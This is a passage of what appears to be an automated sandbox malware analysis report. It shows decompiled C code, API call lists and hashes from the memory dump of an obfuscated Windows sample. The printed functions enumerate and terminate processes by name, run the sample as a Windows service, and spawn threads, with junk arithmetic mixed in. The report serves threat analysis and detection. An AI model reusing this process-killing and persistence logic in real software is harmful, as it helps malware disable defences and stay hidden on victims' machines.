					asm("fsubr qword [ebp-0x8]");
					_v12 =  *0xfae15c;
					asm("fsubr qword [ebp-0x8]");
					_v12 =  *0xfae0a4;
					 *0xfae098 =  *0xfae098 * _v12;
				} else {
					 *0xfae290 = ( *0xfae290 & 0x0000ffff) + 0x57db9040;
				}
				_t58 = 0;
				_t78 = CreateToolhelp32Snapshot(2, 0);
				if(_t78 == 0) {
					L21:
					_t36 = E00F7C990( &_v576, 0, 0x104);
					asm("fld1");
					asm("fsubp st1, st0");
					 *0xfae420 =  *0xfae420 -  *0xfa75c8;
					_v12 =  *0xfae050 -  *0xfa786c -  *0xfa7868;
					_t112 =  *0xfae420;
					asm("fsubr qword [0xfa7860]");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t36 & 0x00000005) != 0) {
						_t71 =  *0xfae2b0; // 0xef43cada
						_t37 =  *0xfae1c0; // 0xa814
						_v8 = _t71;
						asm("fild dword [ebp-0x4]");
						_v8 = _t37 + 0x32db348a;
						_v20 = _t112;
						asm("fild dword [ebp-0x4]");
						_v12 = _t112;
						asm("fsubr qword [ebp-0x10]");
						 *0xfae2b0 = E00F7CABC();
						 *0xfae1c0 =  *0xfae1c0 - 1;
						return _t58;
					} else {
						 *0xfae090 = 0x4000000;
						 *0xfae094 = 0x41b993e8;
						return _t58;
					}
				} else {
					_v316 = 0x128;
					if(Process32First(_t78,  &_v316) == 0) {
						L20:
						CloseHandle(_t78);
						goto L21;
					}
					_push(_t81);
					do {
						_t43 = 0;
						do {
							_t66 =  *((intOrPtr*)(_t84 + _t43 - 0x114));
							 *((char*)(_t84 + _t43 - 0x23c)) = _t66;
							_t43 = _t43 + 1;
						} while (_t66 != 0);
						E00FA2BB6( &_v576);
						_t67 = _a4;
						_t86 = _t86 + 4;
						_t46 =  &_v576;
						while(1) {
							_t73 =  *_t46;
							if(_t73 !=  *_t67) {
								break;
							}
							if(_t73 == 0) {
								L13:
								_t46 = 0;
								goto L15;
							}
							_t76 =  *((intOrPtr*)(_t46 + 1));
							_t18 = _t67 + 1; // 0xd06804c4
							if(_t76 !=  *_t18) {
								break;
							}
							_t46 = _t46 + 2;
							_t67 = _t67 + 2;
							if(_t76 != 0) {
								continue;
							}
							goto L13;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						L15:
						if(_t46 == 0) {
							_t82 = OpenProcess(1, _t46, _v308);
							if(_t82 != 0) {
								_t58 = _t58 + 1;
								_v12 =  *0xfae420 -  *0xfae1d8 -  *0xfa7870;
								 *0xfae3b0 =  *0xfae3b0 * _v12;
								TerminateProcess(_t82, 0xffffffff);
								CloseHandle(_t82);
							}
						}
						_t74 =  *0xfae528; // 0x0
						_t47 =  *0xfae52c; // 0x7ff00000
						 *0xfae1b8 = _t74;
						 *0xfae1bc = _t47;
						_v316 = 0x128;
						 *0xfae528 =  *0xfae528 +  *0xfa75c8;
						_t68 =  *0xfae028; // 0x781e
						 *0xfae4e8 =  *0xfae4e8 + 0xe8ebad64 - _t68;
					} while (Process32Next(_t78,  &_v316) != 0);
					goto L20;
				}
			}

0x00f696d0
0x00f696d3
0x00f696d9
0x00f696df
0x00f696e7
0x00f696ee
0x00f696fa
0x00f69710
0x00f69716
0x00f69719
0x00f6971c
0x00f69725
0x00f69728
0x00f69731
0x00f69734
0x00f69740
0x00f696fc
0x00f69708
0x00f69708
0x00f69748
0x00f69753
0x00f69757
0x00f6989b
0x00f698a9
0x00f698b4
0x00f698b9
0x00f698cd
0x00f698e5
0x00f698e8
0x00f698ee
0x00f698f4
0x00f698f7
0x00f698fc
0x00f6991a
0x00f69920
0x00f69926
0x00f69929
0x00f69935
0x00f69938
0x00f6993b
0x00f6993e
0x00f6994a
0x00f69952
0x00f69957
0x00f69965
0x00f698fe
0x00f698ff
0x00f6990b
0x00f69919
0x00f69919
0x00f6975d
0x00f69765
0x00f69777
0x00f69894
0x00f69895
0x00000000
0x00f69895
0x00f6977d
0x00f69780
0x00f69780
0x00f69790
0x00f69790
0x00f69797
0x00f6979e
0x00f6979f
0x00f697aa
0x00f697af
0x00f697b2
0x00f697b5
0x00f697c0
0x00f697c0
0x00f697c4
0x00000000
0x00000000
0x00f697c8
0x00f697dc
0x00f697dc
0x00000000
0x00f697dc
0x00f697ca
0x00f697cd
0x00f697d0
0x00000000
0x00000000
0x00f697d2
0x00f697d5
0x00f697da
0x00000000
0x00000000
0x00000000
0x00f697da
0x00f697e0
0x00f697e2
0x00f697e5
0x00f697e7
0x00f697f9
0x00f697fd
0x00f6980e
0x00f69815
0x00f69821
0x00f69827
0x00f6982e
0x00f6982e
0x00f697fd
0x00f69834
0x00f6983a
0x00f6983f
0x00f69845
0x00f6985b
0x00f69865
0x00f6986b
0x00f69877
0x00f6988b
0x00000000
0x00f69893

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F6974D
Process32First.KERNEL32(00000000,?), ref: 00F6976F
OpenProcess.KERNEL32(00000001,?,?,00000000), ref: 00F697F3
TerminateProcess.KERNEL32(00000000,000000FF), ref: 00F69827
CloseHandle.KERNEL32(00000000), ref: 00F6982E
Process32Next.KERNEL32(00000000,00000128), ref: 00F69885

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: ProcessProcess32$CloseCreateFirstHandleNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2114703998-0
Opcode ID: 6c4d6b6fad107f1fa789e0789ef854058e995786fd04f0c708efab55d761bdcb
Instruction ID: 1086ef678afbffbe5f90cabd9ed26b5ee981e394978ed886b99efd6c5fad18c8
Opcode Fuzzy Hash: 6c4d6b6fad107f1fa789e0789ef854058e995786fd04f0c708efab55d761bdcb
Instruction Fuzzy Hash: 456125B5D0460CDBDB009F64FC986EA7FB8FB86320F258199D885932A0DB754A64FB41

Uniqueness

Uniqueness Score: -1.00%

Function 00F6D610 Relevance: 12.1, APIs: 8, Instructions: 124
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F6D610() {
				signed char _v8;
				intOrPtr _v12;
				long long _v16;
				long long _v24;
				long long _t14;
				int _t17;
				intOrPtr _t18;
				signed char _t19;
				void* _t25;
				int _t26;
				signed char _t30;
				int _t31;
				intOrPtr _t35;
				intOrPtr _t36;
				signed char _t38;
				void* _t41;
				intOrPtr _t42;
				void* _t44;
				short _t45;
				char* _t46;
				int _t47;
				intOrPtr _t50;
				int _t51;
				long long _t66;

				 *0xfae420 =  *0xfae420 -  *0xfa75c8;
				_t14 =  *0xfae420; // 0x5b800000
				_t35 =  *0xfae424; // 0xc1d08110
				_v16 = _t14;
				_v12 = _t35;
				_t66 =  *0xfae360 + _v16;
				 *0xfb02b8 = 0x30;
				 *0xfb02bc = 1;
				 *0xfb02c0 = 0;
				 *0xfae360 = _t66;
				_t45 =  *0xfae108; // 0x5dc4
				_t36 =  *0xfae310; // 0x604307b9
				_t46 =  *0xfb04ac; // 0x2731140
				 *0xfae108 = _t36 + _t45 + 0xf1e57a6a;
				 *0xfb02c4 = 0;
				 *0xfb02c8 = 0;
				 *0xfb02cc = 0;
				 *0xfb02d0 = 0;
				_t17 = RegisterServiceCtrlHandlerA(_t46, E00F6D290);
				 *0xfb0320 = _t17;
				if(_t17 != 0) {
					 *0xfb02bc = 2;
					 *0xfae4e8 =  *0xfae4e8 + 0xe9f5ae4f - ( *0xfae048 & 0x0000ffff);
					_t47 =  *0xfb0320; // 0x0
					SetServiceStatus(_t47, 0xfb02b8);
					 *0xfae4bc = 0x2a1b63df - ( *0xfae048 & 0x0000ffff);
					_t25 = CreateEventA(0, 0, 0, 0);
					 *0xfb02c0 =  *0xfb02c0 | 0x00000005;
					 *0xfb0298 = _t25;
					_t26 =  *0xfb0320; // 0x0
					 *0xfb02bc = 4;
					SetServiceStatus(_t26, 0xfb02b8);
					 *0xfae330 =  *0xfae330 + 0xe05cc5a9;
					do {
						_t41 =  *0xfb0298; // 0x0
					} while (WaitForSingleObject(_t41, 0x1388) == 0x102);
					_t50 =  *0xfb0284; // 0x490
					E00F6F090(_t66, _t50);
					_t30 =  *0xfae038; // 0x80000000
					_t42 =  *0xfae594; // 0x80000001
					_v8 = _t30;
					asm("fild dword [ebp-0x4]");
					_v8 = _t42 - 0x6430062d;
					_v24 = _t66;
					 *0xfb02bc = 3;
					asm("fild dword [ebp-0x4]");
					_v16 = _t66;
					asm("fsubr qword [ebp-0xc]");
					asm("fucompp");
					asm("fnstsw ax");
					if((_t30 & 0x00000044) == 0) {
						 *0xfae048 = ( *0xfae048 & 0x0000ffff) - 0x7b923dec;
					}
					_t31 =  *0xfb0320; // 0x0
					SetServiceStatus(_t31, 0xfb02b8);
					_t44 =  *0xfb0298; // 0x0
					CloseHandle(_t44);
					_t51 =  *0xfb0320; // 0x0
					 *0xfb02c0 =  *0xfb02c0 & 0xfffffffa;
					 *0xfb0298 = 0;
					 *0xfb02bc = 1;
					SetServiceStatus(_t51, 0xfb02b8);
				}
				asm("fld1");
				asm("faddp st1, st0");
				_t18 =  *0xfae344; // 0x7f800000
				_t38 =  *0xfae390; // 0xcd6d4fe9
				_v8 = _t38;
				asm("fild dword [ebp-0x4]");
				_v12 = _t18;
				_t19 = E00F7CABC();
				 *0xfae390 = _t19;
				return _t19;
			}

0x00f6d62a
0x00f6d630
0x00f6d635
0x00f6d641
0x00f6d644
0x00f6d647
0x00f6d64a
0x00f6d654
0x00f6d65e
0x00f6d664
0x00f6d66a
0x00f6d671
0x00f6d67a
0x00f6d688
0x00f6d68f
0x00f6d695
0x00f6d69b
0x00f6d6a1
0x00f6d6a7
0x00f6d6ad
0x00f6d6b4
0x00f6d6cb
0x00f6d6d5
0x00f6d6db
0x00f6d6e7
0x00f6d701
0x00f6d708
0x00f6d70e
0x00f6d715
0x00f6d71a
0x00f6d725
0x00f6d72f
0x00f6d735
0x00f6d740
0x00f6d740
0x00f6d752
0x00f6d759
0x00f6d760
0x00f6d765
0x00f6d76a
0x00f6d770
0x00f6d773
0x00f6d77c
0x00f6d782
0x00f6d785
0x00f6d78f
0x00f6d792
0x00f6d79b
0x00f6d7a1
0x00f6d7a3
0x00f6d7a8
0x00f6d7b7
0x00f6d7b7
0x00f6d7be
0x00f6d7c9
0x00f6d7cf
0x00f6d7d6
0x00f6d7dc
0x00f6d7e2
0x00f6d7ef
0x00f6d7f5
0x00f6d7ff
0x00f6d7ff
0x00f6d80b
0x00f6d80d
0x00f6d815
0x00f6d81a
0x00f6d820
0x00f6d823
0x00f6d826
0x00f6d82c
0x00f6d831
0x00f6d83a

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(02731140,Function_0000D290), ref: 00F6D6A7
SetServiceStatus.ADVAPI32(00000000,00FB02B8), ref: 00F6D6E7
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F6D708
SetServiceStatus.ADVAPI32(00000000,00FB02B8), ref: 00F6D72F
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00F6D74C
SetServiceStatus.ADVAPI32(00000000,00FB02B8), ref: 00F6D7C9
CloseHandle.KERNEL32(00000000), ref: 00F6D7D6
SetServiceStatus.ADVAPI32(00000000,00FB02B8), ref: 00F6D7FF

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
String ID:
API String ID: 3399922960-0
Opcode ID: 0729eae925eb793cc04dd46ce6acd05331b586923f513abe3fee7cf85751698a
Instruction ID: 01fc60ac2393f117426fa405190a4befad49951da1b157a1782e4446b2c7c348
Opcode Fuzzy Hash: 0729eae925eb793cc04dd46ce6acd05331b586923f513abe3fee7cf85751698a
Instruction Fuzzy Hash: C75142B890031CEFC704DF65EDD896A3BB8FB4A301B248659E849933A4DB748958FF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F700B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F700B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
				signed int _v8;
				long long _v16;
				long long _v24;
				void* __ebp;
				signed char _t22;
				signed int _t23;
				intOrPtr _t25;
				void* _t28;
				intOrPtr* _t33;
				void* _t35;
				unsigned int _t36;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				signed int _t53;
				intOrPtr* _t55;
				void _t56;
				signed int _t59;
				signed int _t65;
				void* _t70;
				intOrPtr _t72;
				char _t73;
				intOrPtr _t75;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t95;
				void* _t96;
				long long _t112;
				long long _t115;
				long long _t117;

				_t85 = __esi;
				_t77 = __edi;
				_t52 = __ebx;
				_t22 =  *0xfae234; // 0x82cc2880
				_t112 =  *0xfae0d0 +  *0xfa7910;
				_v8 = _t22;
				_v16 = _t112;
				asm("fild dword [ebp-0x4]");
				_v24 = _t112 + _v16;
				_t53 =  *0xfae2ec; // 0x76d570f4
				 *0xfae2ec =  *0xfae2ec - 1;
				_v16 =  *0xfae5c0;
				_v8 = _t53;
				asm("fild dword [ebp-0x4]");
				asm("fsubr qword [ebp-0xc]");
				asm("fcomp qword [ebp-0x14]");
				asm("fnstsw ax");
				if((_t22 & 0x00000001) == 0) {
					st0 =  *0xfae3b8;
				}
				_t115 =  *0xfae2a4;
				asm("fld1");
				asm("faddp st1, st0");
				 *0xfae2a4 = _t115;
				_t23 =  *0xfae594; // 0x80000001
				_v8 = _t23;
				asm("fild dword [ebp-0x4]");
				_v24 = _t115;
				asm("fsubr qword [ebp-0x14]");
				_v24 =  *0xfae2a4;
				_t117 =  *0xfae200;
				asm("fsubr qword [ebp-0x14]");
				asm("fcomp qword [0xfa7908]");
				asm("fnstsw ax");
				if((_t23 & 0x00000041) == 0) {
					_t75 =  *0xfae37c; // 0x277c3927
					_t23 = ( *0xfae4a8 & 0x0000ffff) - _t75;
					 *0xfae060 = ( *0xfae060 & 0x0000ffff) * _t23;
					 *0xfae37c =  *0xfae37c - 1;
				}
				if( *0xfafb1c != 0) {
					_t70 =  *0xfb04d0; // 0x48c
					E00F6F090(_t117, _t70);
					_t25 =  *0xfb095c; // 0x0
					_t92 = _t91 + 4;
					_t104 = _t25;
					if(_t25 != 0) {
						L13:
						E00F7D580(_t25, _a4,  &_a8);
						_t72 =  *0xfb095c; // 0x0
						_push(_t72);
						E00F7D3B9(_t52, _t72, _t77, _t85, _t110);
						L14:
						_t28 =  *0xfb04d0; // 0x48c
						return ReleaseMutex(_t28);
					}
					_push(_t85);
					_push(_t77);
					_t78 = E00F760C0(0xfb0858);
					GetModuleFileNameA(0, 0xfb0858, 0x104);
					 *0xfae1c0 = E00F7CABC();
					_t121 =  *0xfae450 -  *0xfa75c8;
					 *0xfae450 =  *0xfae450 -  *0xfa75c8;
					_t33 = E00F6CF90(_t104,  *0xfae450 -  *0xfa75c8, 0x3dee, 6);
					_t95 = _t92 + 0xc;
					_t55 = _t33;
					do {
						_t73 =  *_t55;
						 *((char*)(0xfb0800 + _t55)) = _t73;
						_t55 = _t55 + 1;
					} while (_t73 != 0);
					E00F76570(6, _t33);
					_t15 = _t78 + 0xfb0858; // 0xfb0858
					_t35 = _t15;
					_t96 = _t95 + 8;
					_t88 = _t35;
					do {
						_t56 =  *_t35;
						_t35 = _t35 + 1;
					} while (_t56 != 0);
					_t36 = _t35 - _t88;
					_t80 = 0xfb07ff;
					do {
						_t16 = _t80 + 1; // 0x0
						_t80 = _t80 + 1;
						_t109 =  *_t16;
					} while ( *_t16 != 0);
					_t59 = _t36 >> 2;
					memcpy(_t88 + _t59 + _t59, _t88, memcpy(_t80, _t88, _t59 << 2) & 0x00000003);
					 *0xfae014 =  *0xfae014 - 1;
					_t39 =  *0xfae014; // 0x0
					_t19 = _t39 + 0x7962c180; // 0x7a5dc9d9
					 *0xfae5a8 = ( *0xfae5a8 & 0x0000ffff) + _t19;
					E00F7C990(0xfb0858, 0, 0x104);
					_t42 = E00F6CF90(_t109, _t121, 0xbdc, 5);
					_t43 =  *0xfae01c; // 0x9b827a58
					_t65 =  *0xfae47c; // 0xd2bf0293
					 *0xfae47c = _t65 * (_t43 + 0x45292e4e);
					 *0xfae01c =  *0xfae01c + 1;
					E00F6F190(_t121, 0xfb0800, GetTickCount(), _t42);
					E00F76570(5, _t42);
					 *0xfb095c = E00F7D699(0xfb0800, E00F6CF90(_t109, _t121, 0xf56, 3));
					E00F76570(3, _t48);
					_t25 =  *0xfb095c; // 0x0
					_t92 = _t96 + 0x58;
					_pop(_t77);
					_pop(_t85);
					_t110 = _t25;
					if(_t25 == 0) {
						goto L14;
					}
					goto L13;
				}
				return _t23;
			}

0x00f700b0
0x00f700b0
0x00f700b0
0x00f700bc
0x00f700c1
0x00f700c7
0x00f700ca
0x00f700cd
0x00f700d3
0x00f700dc
0x00f700e2
0x00f700e8
0x00f700eb
0x00f700ee
0x00f700f1
0x00f700f4
0x00f700f7
0x00f700fc
0x00f7010b
0x00f7010b
0x00f7010d
0x00f70113
0x00f70115
0x00f70117
0x00f7011d
0x00f70122
0x00f70125
0x00f70128
0x00f70131
0x00f70134
0x00f70137
0x00f7013d
0x00f70140
0x00f70146
0x00f7014b
0x00f70154
0x00f70164
0x00f70169
0x00f70170
0x00f70170
0x00f7017d
0x00f70183
0x00f7018a
0x00f7018f
0x00f70194
0x00f70197
0x00f70199
0x00f702f8
0x00f70301
0x00f70306
0x00f7030c
0x00f7030d
0x00f70315
0x00f70315
0x00000000
0x00f7031b
0x00f7019f
0x00f701a0
0x00f701ba
0x00f701bc
0x00f701d3
0x00f701df
0x00f701ec
0x00f701f2
0x00f701fc
0x00f701ff
0x00f70203
0x00f70203
0x00f70205
0x00f70208
0x00f70209
0x00f70210
0x00f70215
0x00f70215
0x00f7021b
0x00f7021e
0x00f70220
0x00f70220
0x00f70222
0x00f70223
0x00f7022c
0x00f7022e
0x00f70230
0x00f70230
0x00f70233
0x00f70234
0x00f70234
0x00f7023a
0x00f70244
0x00f70246
0x00f7024d
0x00f70260
0x00f70269
0x00f70275
0x00f70281
0x00f70288
0x00f7028d
0x00f7029e
0x00f702a4
0x00f702b7
0x00f702bf
0x00f702e0
0x00f702e5
0x00f702ea
0x00f702ef
0x00f702f2
0x00f702f3
0x00f702f4
0x00f702f6
0x00000000
0x00000000
0x00000000
0x00f702f6
0x00f70324

APIs

GetModuleFileNameA.KERNEL32(00000000,00FB0858,00000104), ref: 00F701BC
_memset.LIBCMT ref: 00F70275
GetTickCount.KERNEL32 ref: 00F702AB

Part of subcall function 00F6F190: __itow.LIBCMT ref: 00F6F1D8

Part of subcall function 00F76570: _memset.LIBCMT ref: 00F76593
Part of subcall function 00F76570: _free.LIBCMT ref: 00F76599

Part of subcall function 00F6CF90: _malloc.LIBCMT ref: 00F6CFC7

Part of subcall function 00F7D699: __fsopen.LIBCMT ref: 00F7D6A6

_vfwprintf.LIBCMT ref: 00F70301

Part of subcall function 00F7D580: _vfprintf_helper.LIBCMT ref: 00F7D595

Part of subcall function 00F7D3B9: _flsall.LIBCMT ref: 00F7D3CD

ReleaseMutex.KERNEL32(0000048C), ref: 00F7031B

Strings

'9|', xrefs: 00F70154, 00F70170

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: _memset$CountFileModuleMutexNameReleaseTick__fsopen__itow_flsall_free_malloc_vfprintf_helper_vfwprintf
String ID: '9|'
API String ID: 3440257774-295376149
Opcode ID: 2283880909c14c02ebf2329778dd736625b77a11ffbb8fbfaa551b146d543195
Instruction ID: 308643f94f7877750f4acb7c09d07c1886fc69d7f76d3f4f184cd30859eb896b
Opcode Fuzzy Hash: 2283880909c14c02ebf2329778dd736625b77a11ffbb8fbfaa551b146d543195
Instruction Fuzzy Hash: 6F510BB0E0020DDBD704DB60FD55B6B3BB8FF4A714F108156E984972A1EB718920FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F648F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F648F0(void* __ecx, signed long long __fp0, _Unknown_base(*)()* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed long long _v12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t32;
				signed int _t33;
				void* _t37;
				signed long long _t42;

				_t13 =  *0xfae280; // 0xf447b558
				_v8 = _t13 + 0x3101df53;
				asm("fild dword [ebp-0x4]");
				_t37 = __ecx;
				_v12 = __fp0;
				_t42 =  *0xfae3f8 + _v12;
				 *0xfae3f8 = _t42;
				 *0xfae280 =  *0xfae280 + 1;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *0xfae018 =  *0xfae018 + 1;
				_t15 =  *0xfae018; // 0xa1fe
				_a8 = _t15 - 0x31931e85;
				asm("fild dword [ebp+0xc]");
				_v12 = _t42;
				asm("fsubr qword [ebp-0x8]");
				 *0xfae324 =  *0xfae520;
				asm("fld1");
				asm("fsubp st1, st0");
				 *((intOrPtr*)(__ecx + 8)) = _a12;
				_t32 =  *0xfae5b4; // 0x1cd4719a
				_t33 =  *0xfae34c; // 0x80000000
				 *0xfae34c = _t33 * (0x5256d8c - _t32);
				 *_t37 = CreateEventA(0, 1, 0, 0);
				CloseHandle(CreateThread(0, 0, _a4, _t37, 0, 0));
				WaitForSingleObject( *_t37, 0xffffffff);
				CloseHandle( *_t37);
				 *0xfae1b0 =  *0xfae1b0 -  *0xfa75c8;
				_v12 =  *0xfae1b0 -  *0xfa7750;
				 *0xfae044 =  *0xfae044 * _v12;
				return _t37;
			}

0x00f648f6
0x00f64903
0x00f64906
0x00f6490a
0x00f64911
0x00f6491e
0x00f64924
0x00f6492a
0x00f64930
0x00f64933
0x00f6493a
0x00f6494c
0x00f6494f
0x00f64952
0x00f6495b
0x00f6495e
0x00f6496a
0x00f6496c
0x00f64974
0x00f64977
0x00f64984
0x00f6498d
0x00f6499d
0x00f649af
0x00f649ba
0x00f649c3
0x00f649d8
0x00f649ea
0x00f649f6
0x00f649ff

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00F64993
CreateThread.KERNEL32 ref: 00F649A8
CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00F649AF
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000), ref: 00F649BA
CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000), ref: 00F649C3

Strings

7i\, xrefs: 00F6495E

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: CloseCreateHandle$EventObjectSingleThreadWait
String ID: 7i\
API String ID: 1404307249-1329047267
Opcode ID: cab8ed184fdd05825054e74c634babcac06f7c6d2f53511cfabe3126bf78cc72
Instruction ID: e67c840adfbfb2eeb6f707e5d836f9d80c88d272b5dd50906690c7d52aa616dc
Opcode Fuzzy Hash: cab8ed184fdd05825054e74c634babcac06f7c6d2f53511cfabe3126bf78cc72
Instruction Fuzzy Hash: FF31D1B5A0030CEFD7149F64FC88B997FB4FB8A310F118559E984D72A4DB709564EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F8BF3E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 60%

			E00F8BF3E(intOrPtr* _a4) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr* _t13;
				intOrPtr _t14;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				char* _t29;
				void* _t34;

				_t13 =  *0xfb12d0; // 0x0
				_t14 =  *_t13;
				if(_t14 == 0) {
					_push(0x29);
					_push(_a4);
					_t29 = E00F8B6DD(E00F8B4D8( &_v20, " throw("),  &_v28, 1);
					goto L5;
				} else {
					if(_t14 != 0x5a) {
						_t21 = E00F8BE5E(_t26, _t34,  &_v20);
						E00F8B920(E00F8B4D8( &_v28, " throw("),  &_v12, _t21);
						_push(0x29);
						_push(_a4);
						_t29 =  &_v12;
						L5:
						E00F8BBE4(_t29);
						return _a4;
					} else {
						 *0xfb12d0 =  *0xfb12d0 + 1;
						_t25 = _a4;
						 *_t25 = 0;
						 *(_t25 + 4) = _v8 & 0xffff0000;
						return _t25;
					}
				}
			}

0x00f8bf43
0x00f8bf48
0x00f8bf4f
0x00f8bf9d
0x00f8bf9f
0x00f8bfbc
0x00000000
0x00f8bf51
0x00f8bf53
0x00f8bf74
0x00f8bf8e
0x00f8bf93
0x00f8bf95
0x00f8bf98
0x00f8bfbe
0x00f8bfbe
0x00f8bfc7
0x00f8bf55
0x00f8bf55
0x00f8bf5e
0x00f8bf69
0x00f8bf6b
0x00f8bf6f
0x00f8bf6f
0x00f8bf53

APIs

DName::DName.LIBCMT ref: 00F8BF87
DName::operator+.LIBCMT ref: 00F8BF8E
DName::DName.LIBCMT ref: 00F8BFB0
DName::operator+.LIBCMT ref: 00F8BFB7
DName::operator+.LIBCMT ref: 00F8BFBE

Strings

throw(, xrefs: 00F8BF7F, 00F8BFA8

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: be318c6b9fa179c675bf1b652542bb659364f9569699c4e941ba8784761fd7b2
Instruction ID: cd75266c0522973197bfb6237af4453b6a675e00bee70eaffc46f8abc94ce965
Opcode Fuzzy Hash: be318c6b9fa179c675bf1b652542bb659364f9569699c4e941ba8784761fd7b2
Instruction Fuzzy Hash: FB016934A0020DAFCF04EBA4DC56EFD7BA5AF44344F0440A4F501AB2A6DB74EA45AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F75A00 Relevance: 9.2, APIs: 6, Instructions: 186
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00F75A00(intOrPtr _a4) {
				long long _v12;
				intOrPtr _v16;
				char _v296;
				char _v300;
				char _v560;
				char _v561;
				char _v1080;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t35;
				unsigned int _t36;
				void* _t39;
				int _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t57;
				void* _t64;
				short _t67;
				intOrPtr _t68;
				void* _t69;
				void _t70;
				signed int _t72;
				intOrPtr _t81;
				intOrPtr _t83;
				signed int _t88;
				void _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				void* _t101;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t115;
				long long _t134;

				_t26 = E00F6CEE0(_t25);
				if(_t26 > 0x8000) {
					_t28 = E00F66790( &_v296);
					_t134 =  *0xfae074;
